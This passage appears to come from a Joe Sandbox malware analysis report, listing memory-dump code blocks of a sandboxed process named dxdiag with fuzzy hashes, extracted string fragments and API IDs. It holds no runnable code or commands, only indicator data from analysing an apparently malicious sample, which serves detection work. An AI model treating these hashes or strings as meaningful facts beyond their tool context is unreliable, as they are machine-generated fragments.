                                                                                          • Opcode Fuzzy Hash: a9c6c59b3ed1c792c943f583d7b073ffa41b41ed4492c6662d551fa54f329e35
                                                                                          • Instruction Fuzzy Hash: DE128F20508FD2DED326C73C8848745BF913B67328F088399D4E55BBD2C3A9A565C7E6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 1/3T$WL$^Q$neA
                                                                                          • API String ID: 0-3205570823
                                                                                          • Opcode ID: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                                                                          • Instruction ID: 36620dcd79f832a97b090e2ed89ea61b800e286945c25bf48684ec17d430fe28
                                                                                          • Opcode Fuzzy Hash: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                                                                          • Instruction Fuzzy Hash: A9D1CEB4100B01CFD7258F25C8A1BA3BBB1FF86314F19858DC8964F7A2D779A855CB94
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: lfpu$t~x}$tuv
                                                                                          • API String ID: 0-2272480740
                                                                                          • Opcode ID: 5ae6ecf5c8bb09ee68a8b92dc996563c67039a06e37478c5de5135c619cc173a
                                                                                          • Instruction ID: e048a5bc52b34c826fc5f58021b05f3e6481ac49658e5248bf4fd3d772931afd
                                                                                          • Opcode Fuzzy Hash: 5ae6ecf5c8bb09ee68a8b92dc996563c67039a06e37478c5de5135c619cc173a
                                                                                          • Instruction Fuzzy Hash: 0CA157B5600601CFD711CF25DC82B6377A2FF96314F1985ADE4468B3A2EB38E841CB59
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: B? !$Z7]9$t3]5
                                                                                          • API String ID: 0-3999537062
                                                                                          • Opcode ID: 0cf34332a4bf5ac9417df9c94bdf918d256be1bc8dad18685bd4c2ad9d159837
                                                                                          • Instruction ID: 72aafdab4af179e30fb4efeb0aca3c27bbb7d088d5539880c917271914cfd205
                                                                                          • Opcode Fuzzy Hash: 0cf34332a4bf5ac9417df9c94bdf918d256be1bc8dad18685bd4c2ad9d159837
                                                                                          • Instruction Fuzzy Hash: 3481D471500712CBD724CF25C8A16A3B7F2FF96760B19C69EC4864FB55E739A882CB44
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: B? !$Z7]9$t3]5
                                                                                          • API String ID: 0-3999537062
                                                                                          • Opcode ID: 73ac118eafa2c0b9157b74d59e9ae57acea3c53c65c112bf242875409304cb73
                                                                                          • Instruction ID: 4772a6b4140a06dcfab1e209944608f824a99ddab1fd18c5bc6537220b9c3e42
                                                                                          • Opcode Fuzzy Hash: 73ac118eafa2c0b9157b74d59e9ae57acea3c53c65c112bf242875409304cb73
                                                                                          • Instruction Fuzzy Hash: F481F4716007128BC325CF29C4916A3F7B2FFA9754B1AC65EC4860F761E339AC82C798
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$OK$P
                                                                                          • API String ID: 0-279604475
                                                                                          • Opcode ID: 15ca00153eb2250557c4211e580d213dc21f231b4513146c676bd93c0b65a243
                                                                                          • Instruction ID: dcd2adf5ba7def60fdbdfda857df2c127c7e65c023c39cfee20c62017944ea30
                                                                                          • Opcode Fuzzy Hash: 15ca00153eb2250557c4211e580d213dc21f231b4513146c676bd93c0b65a243
                                                                                          • Instruction Fuzzy Hash: 7C514972E583904AD334CB39CC827EFB6D29BD6304F09C97DC48DA7345EA3819098746
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: B:@<$F>?0
                                                                                          • API String ID: 0-4011826714
                                                                                          • Opcode ID: db013f8bcd791390b44068821e0592b044049136823266e2a0b8e4940e29ff84
                                                                                          • Instruction ID: 92ed06d7aa227fc4673e4b6d33fedd1ff2714f2f2b1d0eb8acbab6dee258af69
                                                                                          • Opcode Fuzzy Hash: db013f8bcd791390b44068821e0592b044049136823266e2a0b8e4940e29ff84
                                                                                          • Instruction Fuzzy Hash: E43256B1A00721CBCB24CF24C892267BBB1FF92310F59825DD8825F796E779A851CBD5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0$8
                                                                                          • API String ID: 0-46163386
                                                                                          • Opcode ID: f6efbbce20de2b023d6cb677cdd126fc4c2fcca28c45f4f5bbedd8c93d3440d6
                                                                                          • Instruction ID: 0f615e6785466e28a5f93bf1c1a09b996c0b6f7065c9dd489095df40342ff1f6
                                                                                          • Opcode Fuzzy Hash: f6efbbce20de2b023d6cb677cdd126fc4c2fcca28c45f4f5bbedd8c93d3440d6
                                                                                          • Instruction Fuzzy Hash: AA7236716083409FD714CF18C880B9BBBE1AFD5314F48892EF9899B391D779D948CB96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: cba`$f
                                                                                          • API String ID: 2994545307-1109690103
                                                                                          • Opcode ID: ce77e257ab17708985b033a1a28936955ee8b7280a2f22a7d825b70f4c086311
                                                                                          • Instruction ID: 41f0f5caafdb7b8250f40a2fa5a9f5d8922839f2072142bbb4c85c591d71526d
                                                                                          • Opcode Fuzzy Hash: ce77e257ab17708985b033a1a28936955ee8b7280a2f22a7d825b70f4c086311
                                                                                          • Instruction Fuzzy Hash: 9E2224716483419FD314CF28C880B2BBBE2ABD8304F29992EE4D687392D775D915CB97
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: =UA$cba`
                                                                                          • API String ID: 0-2849403845
                                                                                          • Opcode ID: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
                                                                                          • Instruction ID: b0755fcd4efdf1967727a5f4be91126eb1e252dcdfc562f5600afc0ab194aa5f
                                                                                          • Opcode Fuzzy Hash: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
                                                                                          • Instruction Fuzzy Hash: 9402FE34608300EFD7149F24D962BABB7B1FB9A304F94582DF481972A2D775EC45CB8A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TU$c!"
                                                                                          • API String ID: 0-3813282519
                                                                                          • Opcode ID: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
                                                                                          • Instruction ID: a4d5b8c078bf2433dc24120fb7555f1f32600d90c3be649242fb2c546733d6d2
                                                                                          • Opcode Fuzzy Hash: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
                                                                                          • Instruction Fuzzy Hash: 27C16672B04310ABD714DB29ED5277BB3E2EFD5314F48852EE88587381E6BCE801875A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: cba`$cba`
                                                                                          • API String ID: 0-1405727707
                                                                                          • Opcode ID: 5c84bb8c798b0e41572f15b67f755068686cedca86a3ad616f5ad894ab6612f1
                                                                                          • Instruction ID: cf914851eadaaefefd268cafab99a3ed5656e84c3113c822c7bea81855011779
                                                                                          • Opcode Fuzzy Hash: 5c84bb8c798b0e41572f15b67f755068686cedca86a3ad616f5ad894ab6612f1
                                                                                          • Instruction Fuzzy Hash: 2BD1F034609202DFD708DF25EC51A2AB3F6FB99706F19887CE58683291D738EE51CB49
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: <vB$cba`
                                                                                          • API String ID: 0-498934516
                                                                                          • Opcode ID: d4f623a5fb0a0c8f92519baea591e51ccb09485aaf33c8d24cde6aecc2ef88d5
                                                                                          • Instruction ID: da3196872b256321ec34466f7baf0807fde79cf67f05401d592e0b2ad76434be
                                                                                          • Opcode Fuzzy Hash: d4f623a5fb0a0c8f92519baea591e51ccb09485aaf33c8d24cde6aecc2ef88d5
                                                                                          • Instruction Fuzzy Hash: 29B107B5A087248FD718CF28E85172BB7E2ABC5304F4A857DD9968B392DB349C01DB85
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: )$IEND
                                                                                          • API String ID: 0-707183367
                                                                                          • Opcode ID: bc4bf555bbeff42da8388944a93aac8362fee21b005dad154d3f6f1e39364d8b
                                                                                          • Instruction ID: 4afb57b326d3e49d9fc8e0a24ea4f70629e8547001b2e63d72ffbe4a7bfc289b
                                                                                          • Opcode Fuzzy Hash: bc4bf555bbeff42da8388944a93aac8362fee21b005dad154d3f6f1e39364d8b
                                                                                          • Instruction Fuzzy Hash: 42D1C2B1A08344AFD710CF14D84575FBBE4AB94308F14492EFA99AB3C1D779D908CB96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: &$(-$(,"-
                                                                                          • API String ID: 0-2940422652
                                                                                          • Opcode ID: 842e3b4bad717ffb86fa21b0642b285fa84ec43394ca04797a762ceea37fb35b
                                                                                          • Instruction ID: ae70fb115a879a18d64fb530bcee3728d6c7b0029ca7c8029ea195d6610fa6e3
                                                                                          • Opcode Fuzzy Hash: 842e3b4bad717ffb86fa21b0642b285fa84ec43394ca04797a762ceea37fb35b
                                                                                          • Instruction Fuzzy Hash: A571066110C3868ED7158F29949077BBFE19FE2304F1849BEE4D5AB383D739890AC766
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "=B$vw
                                                                                          • API String ID: 0-457850316
                                                                                          • Opcode ID: 051963b576788cf0d88f3c6bd725d199eeee0da8a148a68b8bbb1709fcb4336e
                                                                                          • Instruction ID: f315680c62e70f20da2e1c8123195ba5c4b2be5aa43e99e7c1204dac969b8674
                                                                                          • Opcode Fuzzy Hash: 051963b576788cf0d88f3c6bd725d199eeee0da8a148a68b8bbb1709fcb4336e
                                                                                          • Instruction Fuzzy Hash: BA91327220C3548BD314CF68EC81B5BBBE1FBC5318F154A3DF9985B281D7B599058B86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %$BzJ
                                                                                          • API String ID: 0-1159491165
                                                                                          • Opcode ID: d50dfa369b2cabffe8d628b0ac0056a4e2c295f14812191870c99ff4e33fffd4
                                                                                          • Instruction ID: 15970c7872f0f24117a588b544366ad47cb00c5e8ff479cf6d2c6aa966492e42
                                                                                          • Opcode Fuzzy Hash: d50dfa369b2cabffe8d628b0ac0056a4e2c295f14812191870c99ff4e33fffd4
                                                                                          • Instruction Fuzzy Hash: 5551277450C3828BD7158B3994617B7BFE1DFA3305F68045DE0C287693DB2A854ACBAB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: pr$|~
                                                                                          • API String ID: 0-4145297803
                                                                                          • Opcode ID: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                                                                          • Instruction ID: 1c71e515e24bd4364ede3925d09e369eeeaf8989eca5e2d791649c7508655d54
                                                                                          • Opcode Fuzzy Hash: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                                                                          • Instruction Fuzzy Hash: E451F0B0A0C3509BD7008F24D8127ABB7F1EF92319F1885AEE4C55B391E7399642CB5E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: pr$|~
                                                                                          • API String ID: 0-4145297803
                                                                                          • Opcode ID: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                                                                          • Instruction ID: b30244ed6a2ff3de417c81c30de102dda9fa652a451c4e072b4a3ececf8c80cf
                                                                                          • Opcode Fuzzy Hash: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                                                                          • Instruction Fuzzy Hash: B751F4B460C3509BD7009F24C8126ABB7F1EF92315F1885ADE4C55B391E739D642CB5E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: c!"$cba`
                                                                                          • API String ID: 0-3815079656
                                                                                          • Opcode ID: 5399830b24d0c7c21206e2b52d5cb164668a13b1fa724a81154e92aaa802a904
                                                                                          • Instruction ID: d439ba287dcba63c8f7a659613d28fe1dbaf1e7a7a1ec41ac89f2e19b51e5e51
                                                                                          • Opcode Fuzzy Hash: 5399830b24d0c7c21206e2b52d5cb164668a13b1fa724a81154e92aaa802a904
                                                                                          • Instruction Fuzzy Hash: AF51387464C300ABE324EF25EC81B2B77A6FBD9304F15582DE1C687241D778AC01DBAA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: BLJB$X
                                                                                          • API String ID: 0-2222927247
                                                                                          • Opcode ID: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                                                                          • Instruction ID: 1af2eb929763e148cb4abff1c4585c52a2657f08fe5d59f4d12d45bf37d2de30
                                                                                          • Opcode Fuzzy Hash: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                                                                          • Instruction Fuzzy Hash: 13515531708B618BD730DE6894412FBBBE1DF55350F984A3ED8D987382E23CA545E74A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: H.s $ij
                                                                                          • API String ID: 0-4017226643
                                                                                          • Opcode ID: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
                                                                                          • Instruction ID: ae217f9daa6f4cce8b7d259f4259de876ba9e86de0ba8af5ed87a71d833a3b47
                                                                                          • Opcode Fuzzy Hash: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
                                                                                          • Instruction Fuzzy Hash: 0F31DEB260D3908FD314CF65D48165FBBE2EBC6704F55892DE4C56B340CBB49906CB46
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: 1/3T
                                                                                          • API String ID: 2994545307-3266294232
                                                                                          • Opcode ID: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
                                                                                          • Instruction ID: ff65059a960126ae2aa6a0ba82ae0d71c7a8e5e6bd522a8814a62b27b48fd42c
                                                                                          • Opcode Fuzzy Hash: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
                                                                                          • Instruction Fuzzy Hash: 37F1E134204741CFE7258F29D891BB3BBA2FB5A301F1945ADD5D68B392C739E881CB58
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: cba`
                                                                                          • API String ID: 0-1926275841
                                                                                          • Opcode ID: 3f29fd3a069bb16d361132c5aa8a0ede2e0d2aaea110744ff23cb538c4bc5ae4
                                                                                          • Instruction ID: 14714d2ba1fa74e4959dcbafcfb1335b2d24fab57e9a1ae0764d95646eda8daf
                                                                                          • Opcode Fuzzy Hash: 3f29fd3a069bb16d361132c5aa8a0ede2e0d2aaea110744ff23cb538c4bc5ae4
                                                                                          • Instruction Fuzzy Hash: 47C177B590C3144BD330EF15D8C162BB7A2AF99314F0A962DE9C657352E738AC05CBDA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: K%
                                                                                          • API String ID: 0-424693878
                                                                                          • Opcode ID: 37b01ca38506eb230e9e43b73d8b4a05ed4a32d3362ed536e1d7410f5922aec2
                                                                                          • Instruction ID: 7540c4282cdacfbe722bd69171a89485793de9a2a526d887569807fd05c65936
                                                                                          • Opcode Fuzzy Hash: 37b01ca38506eb230e9e43b73d8b4a05ed4a32d3362ed536e1d7410f5922aec2
                                                                                          • Instruction Fuzzy Hash: 9CC124B16083008BDB149F28DC927ABB3E1FF95314F094A2DE582C7391E7B8E945C399
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: &tB
                                                                                          • API String ID: 0-268467982
                                                                                          • Opcode ID: ab8b9b4babc4c53dd273e945744bbaef1afa28ee0cdd2d4e334d85f9a15f2521
                                                                                          • Instruction ID: 06a34f82c29db43340e48ad1cbe7e395302b1ddd3c50ea808075b5b9ec83bf05
                                                                                          • Opcode Fuzzy Hash: ab8b9b4babc4c53dd273e945744bbaef1afa28ee0cdd2d4e334d85f9a15f2521
                                                                                          • Instruction Fuzzy Hash: C5E169B5A083618FC7109F14E45136BB7E1AFDA304F0A486EE8C597342D639ED45CB9B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: cba`
                                                                                          • API String ID: 0-1926275841
                                                                                          • Opcode ID: c94db94e7765f3a71b808c63476c00684dbe44ed22f50a4180e2a827f6d9ca56
                                                                                          • Instruction ID: 193fac06bddc95f6f71a2cfced3675609a912480cc88b1c4448270c4c5f8e929
                                                                                          • Opcode Fuzzy Hash: c94db94e7765f3a71b808c63476c00684dbe44ed22f50a4180e2a827f6d9ca56
                                                                                          • Instruction Fuzzy Hash: BEC146756083209FC314CF29E89162BBBE2FFCA711F59866DE8924B391C7799D01CB85
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "
                                                                                          • API String ID: 0-123907689
                                                                                          • Opcode ID: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
                                                                                          • Instruction ID: f813c1fc85afd7223dda0e36a8c027de47e21e6ca96e88e37e758e8b14c45e64
                                                                                          • Opcode Fuzzy Hash: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
                                                                                          • Instruction Fuzzy Hash: 03C113B2B043215BD7149E25E44076BB7E5AF84310F59892FEC9687382E738DC59C78B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RuA
                                                                                          • API String ID: 0-3286949753
                                                                                          • Opcode ID: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                                                                          • Instruction ID: 812d55878a62f6fab66defe66c88ae53172d99736bf38563795d352ae53827f1
                                                                                          • Opcode Fuzzy Hash: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                                                                          • Instruction Fuzzy Hash: 8CB10234208701CFE7258F29D851B73B7F2EB4A711F1489ADD4968B392D738A882CB58
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: oB
                                                                                          • API String ID: 0-2659631944
                                                                                          • Opcode ID: 0693cc6c46902c7217c4adacdc2c5168b01ac46d7e5509cb09b59ea090d7e90c
                                                                                          • Instruction ID: 9f556a8ac2aeb4471154cd87b74293f5bbb160a2dea8f59859fea2c9b9bc59b4
                                                                                          • Opcode Fuzzy Hash: 0693cc6c46902c7217c4adacdc2c5168b01ac46d7e5509cb09b59ea090d7e90c
                                                                                          • Instruction Fuzzy Hash: 54C11431A08391CFD314CF38A89076ABBA2AF8A314F5947ADF4A55B3E1D3359D04CB59
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x%
                                                                                          • API String ID: 0-3980080454
                                                                                          • Opcode ID: 21b534372c422996cba93c7f3a0046e52d28a6e1f65226b4000f06bfaeed42f9
                                                                                          • Instruction ID: 53925fe815e81de9676dfe4c3668865c11de61aed011eb2c10e86570e61a59d5
                                                                                          • Opcode Fuzzy Hash: 21b534372c422996cba93c7f3a0046e52d28a6e1f65226b4000f06bfaeed42f9
                                                                                          • Instruction Fuzzy Hash: 7BA145B1604320ABCB10DF24DC91B6777E4FF94358F08492DEA858B391E7B9E905C766
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: cba`
                                                                                          • API String ID: 0-1926275841
                                                                                          • Opcode ID: 6e56f68504aedb9c4637ddc64e974fdb85d88a5ec5eac0ceed752bd9f5295936
                                                                                          • Instruction ID: 94ad105f6478fdac957072c6e69bbed76807f6ec97b14cb59ee989f6f6ee26f8
                                                                                          • Opcode Fuzzy Hash: 6e56f68504aedb9c4637ddc64e974fdb85d88a5ec5eac0ceed752bd9f5295936
                                                                                          • Instruction Fuzzy Hash: 7FE1E421508BD18ED336CA3C8804357BFE15B6B314F09CB9DC4EA5B7D2C669A905C7A6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ^@
                                                                                          • API String ID: 0-1015691136
                                                                                          • Opcode ID: 703dd625fb3eb8638aa44194967a27a36d87c0cb45f6d60d58a93a7552ea481a
                                                                                          • Instruction ID: 235d2d97adcff596e282d77143eaa9e06c0732ed9a934443ad0122243597bde8
                                                                                          • Opcode Fuzzy Hash: 703dd625fb3eb8638aa44194967a27a36d87c0cb45f6d60d58a93a7552ea481a
                                                                                          • Instruction Fuzzy Hash: AE71CCB66883108BC324CF59C89226BF7F2FFD5714F09981DE8D99B350E3788901879A
                                                                                          Strings
